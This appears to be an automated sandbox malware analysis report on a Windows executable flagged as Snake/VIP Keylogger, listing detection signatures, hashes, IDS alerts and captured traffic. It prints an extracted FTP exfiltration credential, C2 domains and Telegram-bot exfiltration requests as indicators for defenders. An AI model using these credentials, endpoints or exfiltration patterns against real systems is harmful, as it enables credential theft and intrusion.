Windows Analysis Report
3140, EUR.exe

Overview

General Information

Sample name: 3140, EUR.exe
Analysis ID: 1522669
MD5: 332593ae1e0ba5a06370963c37bbbceb
SHA1: 994f8e733ba1961882dcdef0c78fc305db4c1c91
SHA256: 9ca5a71321522f47140b36e5f1983cff7455dd124caa231d97df29cd654c6893
Tags: exeSnakeKeyloggeruser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Found malware configuration
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "humble@quicklyserv.com", "Password": "omobolajijonze12345", "FTP Server": "ftp://quicklyserv.com/"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Virustotal: Detection: 43% Perma Link
Multi AV Scanner detection for submitted file
Source: 3140, EUR.exe ReversingLabs: Detection: 47%
Source: 3140, EUR.exe Virustotal: Detection: 43% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 3140, EUR.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: 3140, EUR.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: 3140, EUR.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: OqNV.pdb source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
Source: Binary string: OqNV.pdbSHA256/{ source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
Source: Binary string: OqNV.pdb|D source: 3140, EUR.exe, 00000000.00000002.1740034846.000000000741E000.00000004.00000020.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 4x nop then jmp 02E1F475h 8_2_02E1F2D8
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 4x nop then jmp 02E1F475h 8_2_02E1F4C4
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 4x nop then jmp 02E1FC31h 8_2_02E1F979
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 056EF475h 15_2_056EF4C4
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 056EF475h 15_2_056EF2D8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 056EFC31h 15_2_056EF979
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F20D0Dh 15_2_06F20B30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F21697h 15_2_06F20B30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F231E0h 15_2_06F22DC8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F22C19h 15_2_06F22968
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2E959h 15_2_06F2E6B0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 15_2_06F20673
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2E501h 15_2_06F2E258
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2E0A9h 15_2_06F2DE00
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2F661h 15_2_06F2F3B8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2F209h 15_2_06F2EF60
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2EDB1h 15_2_06F2EB08
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2D3A1h 15_2_06F2D0F8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2CF49h 15_2_06F2CCA0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 15_2_06F20853
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 15_2_06F20040
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2FAB9h 15_2_06F2F810
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F231E0h 15_2_06F22DB8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2DC51h 15_2_06F2D9A8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F2D7F9h 15_2_06F2D550
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 4x nop then jmp 06F231E0h 15_2_06F2310E

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.4:49780 -> 45.143.99.52:21
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 45.143.99.52 ports 52160,54464,1,2,53879,21
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49779 -> 45.143.99.52:53879
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2010:09:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2015:48:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 45.143.99.52 45.143.99.52
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: EKSENBILISIMTR EKSENBILISIMTR
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49759 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49776 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49774 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 188.114.97.3:443
Uses FTP
Source: unknown FTP traffic detected: 45.143.99.52:21 -> 192.168.2.4:49778 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 16:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2010:09:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2015:48:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: quicklyserv.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 30 Sep 2024 13:03:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
